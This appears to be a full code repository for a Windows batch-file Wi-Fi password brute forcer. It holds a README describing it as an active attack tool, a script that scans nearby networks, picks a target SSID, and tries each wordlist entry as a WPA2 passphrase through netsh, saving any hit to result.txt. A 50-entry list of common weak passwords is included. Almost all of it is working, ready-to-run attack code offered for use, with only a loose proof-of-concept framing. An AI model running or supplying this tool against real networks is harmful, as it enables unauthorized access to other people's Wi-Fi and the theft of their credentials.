├── LICENSE
├── README.md
├── bruteforcer.cmd
└── wordlist.txt
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2023-2024 TechnicalUserX
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Batch Wi-Fi Brute Forcer
2 | An active attack tool against Wi-Fi networks with internal CMD commands.
3 |
4 | This program is created to be a proof of concept that it is possible
5 | to write a working Wi-Fi attack tool with Batchfiles since there
6 | are countless examples on the internet that claims to be legit
7 | hacking tools, working on CMD. While this tool does not claim
8 | a 100% success ratio, it still works if the target Wi-Fi has
9 | weak password. :)
10 |
11 |
12 | 
13 |
14 |
15 |
16 | ## Usage
17 |
18 | ### Interface initialization
19 | The program automatically detects your wireless interfaces when you execute the batch file.
20 | If it finds only one, it will select it as default. If there are multiple interfaces,
21 | the program will ask you to choose one. If none exist, it will stay "not_defined".
22 |
23 | > You can later change the interface by typing `interface` on the main menu.
24 | > This will bring the interface initialization screen back.
25 |
26 | ### Scan
27 | When you type `scan` at the main menu, the program will enumerate all Wi-Fi networks
28 | available from the selected wireless interface. You can choose one by typing the number
29 | associated with an SSID.
30 |
31 | > No Name could mean that the network is hidden. You cannot attack that network.
32 |
33 | > Performing a scan disconnects the interface from the network that it has connected previously.
34 |
35 | ### Selecting a wordlist
36 | A wordlist file is already provided in the repository. If you want to use a custom
37 | wordlist, you have to specify the file you are going to use by typing `wordlist` on the
38 | main menu and then typing the absolute or relative path of the wordlist file.
39 |
40 | ### Attacking
41 | Simply type `attack` and the program will show you a warning screen that this process is going
42 | to delete the profile associated with the SSID if you have connected to it before.
43 | It means you will lose the password you entered while connecting to that SSID before.
44 | Save it before using the attack.
45 |
46 | ### Counter
47 | When a connection is attempted with `netsh` to a network, it takes time to establish the connection. To check whether the connection is successful,
48 | the program repeatedly queries the connection status of the selected interface. A counter value controls how many times this query will be done.
49 | If not changed, the counter value is 10, and counts down after each query for each password combination.
50 |
51 | > If an authentication or association is detected, this value is increased by 5 to ensure a successful connection.
52 |
53 | ## Limitations
54 | - This program has been tested unsuccessfully on Windows 7 and tested successfully on Windows 10 and 11. Since some commands may differ in terms of output between Windows versions, it is not expected to work on previous versions.
55 |
56 | - ANSI escape sequences used in the terminal were added to the Windows Console in the Windows 10 version 1511, previous versions are not expected to run this program.
57 |
58 | - There is a strict dependency on the command line utility `netsh`, meaning that it cannot understand "Unicode" characters. Only ASCII characters are supported for network names.
59 |
60 | - The command line utilities cannot be forced to output English-only text, which means parsing particularly depends on English-based output from command line utilities. Any other system language is not expected to be compatible with this program.
61 |
62 | - Speed is significantly slow due to its nature.
63 |
64 | - Cannot attack hidden networks.
65 |
66 | ## Result file
67 | If an attack is successful, the result is automatically written to `result.txt`.
68 |
69 |
70 | ## Help screen
71 | ```txt
72 | Commands
73 |
74 | - help : Displays this page
75 | - wordlist : Provide a wordlist file
76 | - scan : Performs a WI-FI scan
77 | - interface : Open Interface Management
78 | - attack : Attacks selected WI-FI
79 | - counter : Sets the attack counter
80 | - exit : Close the program
81 |
82 | For more information, please refer to "README.md".
83 |
84 | More projects from TechnicalUserX:
85 | https://github.com/TechnicalUserX
86 |
87 |
88 | Press any key to continue...
89 | ```
90 |
--------------------------------------------------------------------------------
/bruteforcer.cmd:
--------------------------------------------------------------------------------
1 | @echo off
2 | :: Batch Wi-Fi Brute Forcer - Developed By TechnicalUserX
3 | :: Please refer to https://github.com/TechnicalUserX for more projects
4 |
5 | :: This program is created to be a proof of concept that it is possible
6 | :: to write a working Wi-Fi attack tool with Batchfiles since there
7 | :: are countless examples on the internet that claims to be legit
8 | :: hacking tools, working on CMD. While this tool does not claim
9 | :: a 100% success ratio, it still works if the target Wi-Fi has
10 | :: weak password. :)
11 |
12 | :: There is already a wordlist file in the repository but you are free
13 | :: to use your own wordlists.
14 |
15 | cls
16 | setlocal enabledelayedexpansion
17 | title Batch Wi-Fi Brute Forcer
18 | color 0f
19 |
20 | cd /D %~dp0
21 |
22 | if exist "importwifi.xml" (
23 | del importwifi.xml
24 | )
25 |
26 | where wmic 1>nul 2>nul
27 | if %errorlevel% equ 1 (
28 | call :exit_fatal "'wmic' command is not accessible from CMD. Please enable the Windows feature to access 'wmic'"
29 | )
30 |
31 | :: Interface Variables
32 | set interface_number=0
33 | set interface_mac=not_defined
34 | set interface_id=not_defined
35 | set interface_state=not_defined
36 | set interface_description=not_defined
37 | set wifi_target=not_defined
38 |
39 | set attack_counter_option=0
40 |
41 | if not exist "wordlist.txt" (
42 | set wordlist_file=not_defined
43 | ) else (
44 | set wordlist_file=wordlist.txt
45 | )
46 |
47 |
48 | :program_entry
49 | call :interface_init
50 | call :mainmenu
51 | goto :eof
52 |
53 | :interface_detection
54 | cls
55 | echo.
56 | call :color_echo . yellow "Detecting interfaces..."
57 | echo.
58 | set interface_temp_index=0
59 | set interface_number=0
60 |
61 | set interface_parse_counter=0
62 | set interface_parse_begin=false
63 | set interface_parse_line=
64 | set interface_parse_arg=
65 |
66 | for /f "skip=2 tokens=* delims=" %%a in ('netsh wlan show interfaces ^| findstr /n "^"') do (
67 | set "interface_parse_line=%%a"
68 | set "interface_parse_line=!interface_parse_line:*:=!"
69 |
70 | if "!interface_parse_begin!" equ "true" if "!interface_parse_line!" neq "" (
71 |
72 | for /f "tokens=1,* delims=:" %%x in ('echo !interface_parse_line!') do set interface_parse_arg=%%y
73 | call :trim_spaces interface_parse_arg
74 |
75 | if "!interface_parse_counter!" equ "0" (
76 | set interface[!interface_temp_index!]_id=!interface_parse_arg!
77 | )
78 |
79 | if "!interface_parse_counter!" equ "1" (
80 | set interface[!interface_temp_index!]_description=!interface_parse_arg!
81 | )
82 |
83 | if "!interface_parse_counter!" equ "3" (
84 | set interface[!interface_temp_index!]_mac=!interface_parse_arg!
85 | )
86 |
87 | set /a interface_parse_counter=!interface_parse_counter!+1
88 | )
89 |
90 | if !interface_parse_counter! gtr 4 (
91 | set interface_parse_counter=0
92 | set /a interface_temp_index=!interface_temp_index!+1
93 | set interface_parse_begin=false
94 | )
95 |
96 | if "!interface_parse_line!" equ "" (
97 | set interface_parse_begin=true
98 | )
99 |
100 | )
101 |
102 | rem Last line must be redacted
103 | set /a interface_temp_index=!interface_temp_index!-1
104 |
105 | set /a interface_number=!interface_temp_index!+1
106 | timeout /t 2 >nul
107 | cls
108 | goto :eof
109 |
110 |
111 | :color_echo
112 |
113 | :: Check if the first 2 arguments are empty, cause they are needed for background/foreground information
114 | :: The 3rd argument is not that important because it can be an empty string
115 | if "%~1" equ "" (
116 | goto :eof
117 | )
118 | if "%~2" equ "" (
119 | goto :eof
120 | )
121 |
122 | :: Background color; if invalid, no action
123 | if "%~1" equ "black" (
124 | nul
218 | )
219 |
220 | if !interface_number! gtr 1 (
221 |
222 | call :color_echo . yellow " Multiple '!interface_number!' Interfaces Found!"
223 | echo.
224 | timeout /t 3 >nul
225 | call :interface_selection
226 |
227 | )
228 |
229 | if "!interface_number!"=="0" (
230 |
231 | call :color_echo . yellow "WARNING"
232 | echo.
233 | echo No interfaces found on this device^^!
234 | echo.
235 | set interface_id=not_defined
236 | set interface_description=not_defined
237 | set interface_mac=not_defined
238 | pause
239 | cls
240 | )
241 |
242 | goto :eof
243 |
244 |
245 | :interface_selection
246 | cls
247 | echo.
248 | call :color_echo . cyan "Interface Selection"
249 | echo.
250 | echo.
251 | set wifi_target=not_defined
252 | set /a interface_number_zero_indexed=!interface_number!-1
253 | set /a cancel_index=!interface_number_zero_indexed!+1
254 |
255 | for /l %%a in ( 0, 1, !interface_number_zero_indexed! ) do (
256 | call :color_echo . magenta "%%a) "
257 | call :color_echo . white " !interface[%%a]_description!("
258 | call :color_echo . blue "!interface[%%a]_mac!"
259 | call :color_echo . white ")"
260 | echo.
261 | )
262 | call :color_echo
263 | call :color_echo . red "!cancel_index!) Cancel"
264 | echo.
265 | echo.
266 |
267 | call :program_prompt
268 |
269 | if "!program_prompt_input!" equ "" (
270 | call :program_prompt_invalid_input
271 | goto :interface_selection
272 | )
273 |
274 | if !program_prompt_input! leq !interface_number_zero_indexed! (
275 | if !program_prompt_input! geq 0 (
276 | echo.
277 | echo Making !interface[%program_prompt_input%]_description! the interface...
278 | set interface_id=!interface[%program_prompt_input%]_id!
279 | set interface_description=!interface[%program_prompt_input%]_description!
280 | set interface_mac=!interface[%program_prompt_input%]_mac!
281 | timeout /t 3 >nul
282 | ) else (
283 | if "!program_prompt_input!" equ "!cancel_index!" (
284 | set interface_id=not_defined
285 | set interface_description=not_defined
286 | set interface_mac=not_defined
287 | goto :eof
288 | ) else (
289 | call :program_prompt_invalid_input
290 | goto :interface_selection
291 | )
292 | )
293 | ) else (
294 |
295 | if "!program_prompt_input!" equ "!cancel_index!" (
296 | set interface_id=not_defined
297 | set interface_description=not_defined
298 | set interface_mac=not_defined
299 | goto :eof
300 | ) else (
301 | call :program_prompt_invalid_input
302 | goto :interface_selection
303 | )
304 |
305 |
306 | )
307 |
308 |
309 | goto :eof
310 |
311 |
312 | :program_prompt
313 | call :color_echo . green " bruteforcer"
314 | call :color_echo . white "$ "
315 | set /p program_prompt_input=
316 | goto :eof
317 |
318 |
319 | :program_prompt_invalid_input
320 | call :color_echo . red "Invalid input"
321 | timeout /t 3 >nul
322 | goto :eof
323 |
324 | :mainmenu
325 | cls
326 | echo.
327 | echo.
328 | echo. ______________
329 | echo ___/ \_
330 | echo \_ / _ __________\ _/
331 | echo \ / \/ \ /
332 | echo / \ \ \
333 | echo \_ / \ \ \______ \ _/
334 | echo \ \ \ \ \___// / /
335 | echo \__/\__/ \___/ __/ /
336 | echo \ / /
337 | echo \_ \ / _/
338 | echo \ \ / /
339 | echo \________________/
340 | echo.
341 | echo.
342 | call :color_echo . cyan "Batch Wi-Fi Brute Forcer - By TechnicalUserX"
343 | echo.
344 | echo.
345 | call :color_echo . magenta "Interface : "
346 | call :color_echo . white "!interface_description!("
347 | call :color_echo . blue "!interface_mac!"
348 | call :color_echo . white ") "
349 | echo.
350 | call :color_echo . magenta "ID : "
351 | call :color_echo . white "!interface_id!"
352 | echo.
353 | call :color_echo . magenta "Target : "
354 | call :color_echo . white "!wifi_target!"
355 | echo.
356 | call :color_echo . magenta "Wordlist : "
357 | call :color_echo . white "!wordlist_file!"
358 | echo.
359 | echo.
360 | echo Type 'help' for more info
361 | echo.
362 | call :program_prompt
363 | echo.
364 |
365 | if "%program_prompt_input%" equ "scan" (
366 | call :scan
367 | goto :mainmenu
368 | )
369 |
370 | if "%program_prompt_input%" equ "interface" (
371 | call :interface_init
372 | goto :mainmenu
373 | )
374 |
375 | if "%program_prompt_input%" equ "attack" (
376 | call :attack
377 | goto :mainmenu
378 | )
379 |
380 | if "%program_prompt_input%" equ "help" (
381 | call :help
382 | goto :mainmenu
383 | )
384 |
385 |
386 | if "%program_prompt_input%" equ "wordlist" (
387 | call :wordlist
388 | goto :mainmenu
389 | )
390 |
391 | if "%program_prompt_input%" equ "counter" (
392 | call :counter
393 | goto :mainmenu
394 | )
395 |
396 | if "%program_prompt_input%" equ "exit" (
397 | exit
398 | )
399 |
400 | call :program_prompt_invalid_input
401 | goto :mainmenu
402 |
403 |
404 | :scan
405 | cls
406 |
407 | if "%interface_id%" equ "not_defined" (
408 | call :color_echo . red "You have to select an interface to perform a scan"
409 | set wifi_target=not_defined
410 | echo.
411 | echo.
412 | pause
413 | goto :eof
414 | )
415 |
416 | netsh wlan disconnect interface="%interface_id%" > nul
417 |
418 | :scan_wait_disconnected_loop
419 | call :interface_find_state
420 |
421 | if "%interface_state%" neq "disconnected" (
422 | goto :scan_wait_disconnected_loop
423 | )
424 |
425 |
426 | echo.
427 | call :color_echo . cyan "Possible Wi-Fi Networks"
428 | echo.
429 | echo.
430 | echo Scanning...
431 | echo.
432 | :: wifi[] is the array for possible wifis
433 | set scan_wifi_index=0
434 | set cancel_index=0
435 |
436 | set scan_parse_counter=0
437 | set scan_parse_begin=false
438 | set scan_parse_line=
439 | set scan_parse_arg=
440 |
441 | for /f "skip=3 tokens=* delims=" %%a in ('netsh wlan show networks mode^=bssid interface^="%interface_id%" ^| findstr /n "^"') do (
442 | set "scan_parse_line=%%a"
443 | set "scan_parse_line=!scan_parse_line:*:=!"
444 |
445 | if "!scan_parse_begin!" equ "true" if "!scan_parse_line!" neq "" (
446 | for /f "tokens=1,* delims=:" %%x in ("!scan_parse_line!") do set scan_parse_arg=%%y
447 |
448 | call :trim_spaces scan_parse_arg
449 |
450 | if "!scan_parse_counter!" equ "0" (
451 | set wifi[!scan_wifi_index!]_ssid=!scan_parse_arg!
452 | )
453 |
454 | if "!scan_parse_counter!" equ "5" (
455 | set wifi[!scan_wifi_index!]_signal=!scan_parse_arg!
456 | )
457 |
458 | set /a scan_parse_counter=!scan_parse_counter!+1
459 |
460 | )
461 |
462 | if !scan_parse_counter! gtr 5 (
463 | set scan_parse_counter=0
464 | set /a scan_wifi_index=!scan_wifi_index!+1
465 | set scan_parse_begin=false
466 | )
467 |
468 | if "!scan_parse_line!" equ "" (
469 | set scan_parse_begin=true
470 | )
471 |
472 | )
473 | set /a scan_wifi_index=!scan_wifi_index!-1
474 | set /a cancel_index=!scan_wifi_index!+1
475 |
476 | for /l %%a in ( 0, 1, !scan_wifi_index! ) do (
477 |
478 | call :color_echo . magenta "%%a) "
479 |
480 | if "!wifi[%%a]_ssid!" equ "" (
481 | call :color_echo . red "No Name "
482 | ) else (
483 | call :color_echo . white "!wifi[%%a]_ssid! "
484 | )
485 |
486 | call :color_echo . blue "!wifi[%%a]_signal!"
487 | echo.
488 | )
489 |
490 |
491 | call :color_echo . red "!cancel_index!) Cancel"
492 | echo.
493 | echo.
494 |
495 | call :program_prompt
496 | echo.
497 | if "!program_prompt_input!" equ "!cancel_index!" (
498 | goto :eof
499 | )
500 | if !program_prompt_input! leq !scan_wifi_index! if !program_prompt_input! geq 0 (
501 | set "wifi_target=!wifi[%program_prompt_input%]_ssid!"
502 | goto :eof
503 | )
504 | call :program_prompt_invalid_input
505 |
506 | goto :eof
507 |
508 |
509 | :attack
510 |
511 | set attack_finalize=false
512 |
513 | if "!wordlist_file!" equ "not_defined" (
514 | cls
515 | echo.
516 | call :color_echo . red "Please provide a wordlist..."
517 | echo.
518 | echo.
519 | pause
520 | goto :eof
521 | )
522 |
523 |
524 | if "!wifi_target!" equ "not_defined" (
525 | cls
526 | echo.
527 | call :color_echo . red "Please select a target after scanning..."
528 | echo.
529 | echo.
530 | pause
531 | goto :eof
532 | )
533 |
534 | if "!interface_id!" equ "not_defined" (
535 | cls
536 | echo.
537 | call :color_echo . red "Please select an interface..."
538 | echo.
539 | echo.
540 | pause
541 | goto :eof
542 | )
543 |
544 | cls
545 | echo.
546 | call :color_echo . yellow "WARNING"
547 | echo.
548 | echo.
549 | echo If you connected to a network with the same name as this: "!wifi_target!",
550 | echo its profile will be deleted.
551 | echo.
552 | echo This app might not find the correct password if the signal strength
553 | echo is too low. Remember, this is an online attack. Expect slow attempts.
554 | echo.
555 | echo When an authentication is detected, attack counter is
556 | echo automatically increased by 5 to ensure successful connection.
557 | echo.
558 | pause
559 | netsh wlan delete profile name="!wifi_target!" interface="!interface_id!">nul
560 | cls
561 |
562 | set password_count=0
563 |
564 | for /f "tokens=1" %%a in ( !wordlist_file! ) do (
565 |
566 | set /a password_count=!password_count!+1
567 | set password=%%a
568 | set temp_auth_num=0
569 | :: Prepare ssid import
570 | del /Q /F importwifi.xml 2>nul
571 | call :importwifi_write
572 | netsh wlan add profile filename="importwifi.xml" interface="!interface_id!" >nul
573 | cls
574 | echo.
575 | call :color_echo . cyan "Attacking"
576 | echo.
577 | echo.
578 | call :color_echo . magenta "Target Wi-Fi : "
579 | call :color_echo . white "!wifi_target!"
580 | echo.
581 | call :color_echo . magenta "Password Count : "
582 | call :color_echo . white "!password_count!"
583 | echo.
584 | echo.
585 | call :color_echo . blue "Trying password -> "
586 | call :color_echo . yellow "!password!"
587 | echo.
588 | echo.
589 | call :color_echo . cyan "Attempts: "
590 | echo.
591 |
592 | call :attack_attempt
593 |
594 | if "!attack_finalize!" equ "true" (
595 | set attack_finalize=false
596 | goto :eof
597 | )
598 |
599 | )
600 |
601 | call :attack_failure
602 | goto :eof
603 |
604 |
605 | :importwifi_write
606 |
607 | set wifi_target_xml=!wifi_target!
608 | set wifi_target_xml=!wifi_target_xml:^&=^&!
609 | set wifi_target_xml=!wifi_target_xml:^<=^<!
610 | set wifi_target_xml=!wifi_target_xml:^>=^>!
611 | set wifi_target_xml=!wifi_target_xml:^"=^"!
612 | set wifi_target_xml=!wifi_target_xml:^'=^'!
613 |
614 | set password_xml=!password!
615 | set password_xml=!password_xml:^&=^&!
616 | set password_xml=!password_xml:^<=^<!
617 | set password_xml=!password_xml:^>=^>!
618 | set password_xml=!password_xml:^"=^"!
619 | set password_xml=!password_xml:^'=^'!
620 |
621 |
622 | echo ^ >> importwifi.xml
623 | echo ^ >> importwifi.xml
624 | echo ^!wifi_target_xml!^ >> importwifi.xml
625 | echo ^ >> importwifi.xml
626 | echo ^ >> importwifi.xml
627 | echo ^!wifi_target_xml!^ >> importwifi.xml
628 | echo ^ >> importwifi.xml
629 | echo ^ >> importwifi.xml
630 | echo ^ESS^ >> importwifi.xml
631 | echo ^manual^ >> importwifi.xml
632 | echo ^ >> importwifi.xml
633 | echo ^ >> importwifi.xml
634 | echo ^ >> importwifi.xml
635 | echo ^WPA2PSK^ >> importwifi.xml
636 | echo ^AES^ >> importwifi.xml
637 | echo ^false^ >> importwifi.xml
638 | echo ^ >> importwifi.xml
639 | echo ^ >> importwifi.xml
640 | echo ^passPhrase^ >> importwifi.xml
641 | echo ^false^ >> importwifi.xml
642 | echo ^!password_xml!^ >> importwifi.xml
643 | echo ^ >> importwifi.xml
644 | echo ^ >> importwifi.xml
645 | echo ^ >> importwifi.xml
646 | echo ^ >> importwifi.xml
647 | echo ^false^ >> importwifi.xml
648 | echo ^ >> importwifi.xml
649 | echo ^ >> importwifi.xml
650 |
651 | goto :eof
652 |
653 | :attack_failure
654 | del /Q /F importwifi.xml 2>nul
655 | cls
656 | echo.
657 | call :color_echo . red "Could not find the password"
658 | echo.
659 | echo.
660 | netsh wlan delete profile "!wifi_target!" interface="!interface_id!">nul
661 | pause
662 | goto :eof
663 |
664 | :attack_success
665 | del /Q /F importwifi.xml 2>nul
666 | cls
667 | echo.
668 | call :color_echo . green "Found the password"
669 | echo.
670 | echo.
671 | echo.
672 | call :color_echo . magenta "Target : "
673 | call :color_echo . white "!wifi_target!"
674 | echo.
675 | call :color_echo . magenta "Password : "
676 | call :color_echo . white "!password!"
677 | echo.
678 | call :color_echo . magenta "At attempt : "
679 | call :color_echo . white "!password_count!"
680 | echo.
681 | echo.
682 |
683 | echo Batch Wi-Fi Brute Forcer Result>>result.txt
684 | echo Target : !wifi_target!>>result.txt
685 | echo At attempt : !password_count!>>result.txt
686 | echo Password : !password!>>result.txt
687 | echo.>>result.txt
688 | pause
689 | goto :eof
690 |
691 | :attack_attempt
692 | netsh wlan connect name="%wifi_target%" interface="%interface_id%" >nul
693 |
694 | if "%attack_counter_option%" equ "0" (
695 | set attack_counter=5
696 | ) else (
697 | set attack_counter=!attack_counter_option!
698 | )
699 |
700 | set attack_authenticating_detected=false
701 |
702 | :attack_attempt_loop
703 |
704 | if "!attack_counter!" equ "0" (
705 | del /Q /F importwifi.xml 2>nul
706 | goto :eof
707 | )
708 |
709 | call :color_echo . white "Attempts Left ("
710 | call :color_echo . magenta "!attack_counter!"
711 | call :color_echo . white ") "
712 |
713 | timeout /t 1 /nobreak >nul
714 | set interface_state=none
715 | call :interface_find_state
716 |
717 | if "%interface_state%"=="disconnecting" (
718 | call :color_echo . red "Timeout"
719 | echo.
720 | )
721 | if "%interface_state%"=="disconnected" (
722 | call :color_echo . red "Timeout"
723 | echo.
724 | )
725 | if "%interface_state%"=="authenticating" (
726 | call :color_echo . blue "Authenticating"
727 | echo.
728 | )
729 | if "%interface_state%"=="connecting" (
730 | call :color_echo . yellow "Connecting"
731 | echo.
732 | )
733 | if "%interface_state%"=="connected" (
734 | call :color_echo . green "Connected"
735 | echo.
736 | timeout /t 2 /nobreak>nul
737 | )
738 |
739 | if "%interface_state%" equ "authenticating" (
740 | if "!attack_authenticating_detected!" equ "false" (
741 | set /a attack_counter=!attack_counter!+5
742 | set attack_authenticating_detected=true
743 | )
744 | )
745 |
746 | if "!interface_state!" equ "connecting" (
747 | del /Q /F importwifi.xml 2>nul
748 | set attack_finalize=true
749 | call :attack_success
750 | goto :eof
751 | )
752 |
753 | if "!interface_state!" equ "connected" (
754 | del /Q /F importwifi.xml 2>nul
755 | set attack_finalize=true
756 | call :attack_success
757 | goto :eof
758 | )
759 |
760 |
761 | if "!interface_state!" equ "none" (
762 | call :exit_fatal "Cannot find interface state!"
763 | )
764 |
765 | set /a attack_counter=!attack_counter!-1
766 |
767 | goto :attack_attempt_loop
768 |
769 | goto :eof
770 |
771 | :help
772 | cls
773 | echo.
774 | call :color_echo . cyan "Commands"
775 | echo.
776 | echo.
777 | echo - help : Displays this page
778 | echo - wordlist : Provide a wordlist file
779 | echo - scan : Performs a WI-FI scan
780 | echo - interface : Open Interface Management
781 | echo - attack : Attacks selected WI-FI
782 | echo - counter : Sets the attack counter
783 | echo - exit : Close the program
784 | echo.
785 | echo For more information, please refer to "README.md".
786 | echo.
787 | echo More projects from TechnicalUserX:
788 | echo https://github.com/TechnicalUserX
789 | echo.
790 | echo.
791 | echo Press any key to continue...
792 | pause >nul
793 |
794 | goto :eof
795 |
796 |
797 | :wordlist
798 | cls
799 | echo.
800 | call :color_echo . cyan "Wordlist"
801 | echo.
802 | echo.
803 | echo Please provide a valid wordlist
804 | echo.
805 | call :program_prompt
806 | echo.
807 | if not exist "!program_prompt_input!" (
808 | call :color_echo . red "Provided path does not resolve to a file"
809 | timeout /t 2 >nul
810 | ) else (
811 | set wordlist_file=!program_prompt_input!
812 | goto :eof
813 | )
814 | goto :eof
815 |
816 | :counter
817 | cls
818 | echo.
819 | call :color_echo . cyan "Set Attempt Count"
820 | echo.
821 | echo.
822 | echo Please provide number for per-password
823 | echo counter while attacking a network.
824 | echo.
825 | echo This counter will be used to query network
826 | echo connection whether it is successful.
827 | echo.
828 | call :program_prompt
829 | echo.
830 | echo %program_prompt_input%| findstr /r "^[0-9]*$" >nul
831 |
832 | if "%errorlevel%" equ "0" (
833 | set attack_counter_option=!program_prompt_input!
834 | ) else (
835 | call :color_echo . red "Provided input is not a valid number"
836 | timeout /t 2 >nul
837 | )
838 | goto :eof
839 |
840 | :interface_find_state
841 |
842 | for /f "tokens=2 delims==" %%A in ('wmic path WIN32_NetworkAdapter where "NetConnectionID='!interface_id!'" get NetConnectionStatus /value') do (
843 | set interface_status_code=%%A
844 | )
845 |
846 | if "%interface_status_code%"=="1" (
847 | set interface_state=connecting
848 | )
849 |
850 | if "%interface_status_code%"=="2" (
851 | set interface_state=connected
852 | )
853 |
854 | if "%interface_status_code%"=="3" (
855 | set interface_state=disconnecting
856 | )
857 |
858 | if "%interface_status_code%"=="7" (
859 | set interface_state=disconnected
860 | )
861 |
862 | if "%interface_status_code%"=="8" (
863 | set interface_state=authenticating
864 | )
865 |
866 | goto :eof
867 |
868 |
869 | :exit_fatal
870 | call :color_echo . red "%~1"
871 | timeout /t 3 >nul
872 | exit
873 | goto :eof
874 |
875 |
876 | :trim_right
877 | set "str=!%~1!"
878 | :trim_right_loop
879 | if "!str:~-1!"==" " (
880 | set "str=!str:~0,-1!"
881 | goto trim_right_loop
882 | )
883 | set %~1=!str!
884 | goto :eof
885 |
886 |
887 | :trim_left
888 | set "str=!%~1!"
889 | :trim_left_loop
890 | if "!str:~0,1!"==" " (
891 | set "str=!str:~1!"
892 | goto trim_left_loop
893 | )
894 | set %~1=!str!
895 | goto :eof
896 |
897 |
898 | :trim_spaces
899 | call :trim_left %1
900 | call :trim_right %1
901 | goto :eof
902 |
--------------------------------------------------------------------------------
/wordlist.txt:
--------------------------------------------------------------------------------
1 | password
2 | 12341234
3 | 1a2b3c4d
4 | 12345678
5 | 123456789
6 | 1q2w3e4r
7 | 1234567890
8 | 1qaz2wsx
9 | abcd1234
10 | 11111111
11 | 987654321
12 | asdf1234
13 | abcd6789
14 | 20202020
15 | 1234qwer
16 | qwertyuiop
17 | q1w2e3r4
18 | 88888888
19 | qwerty123
20 | passw0rd
21 | asdfghjkl
22 | asdfasdf
23 | 12345678910
24 | Passw0rd
25 | 147852369
26 | 44444444
27 | xxxxxxxx
28 | a1234567
29 | 999999999
30 | 0987654321
31 | 77777777
32 | 789456123
33 | 0123456789
34 | 22222222
35 | 12121212
36 | 1234abcd
37 | aaaaaaaa
38 | 11223344
39 | a1b2c3d4
40 | abcdefgh
41 | 1q2w3e4r5t
42 | Password
43 | asdfghjk
44 | 12qwaszx
45 | 12344321
46 | qwerty12
47 | 87654321
48 | 123123123
49 | hello123
50 | 00000000
--------------------------------------------------------------------------------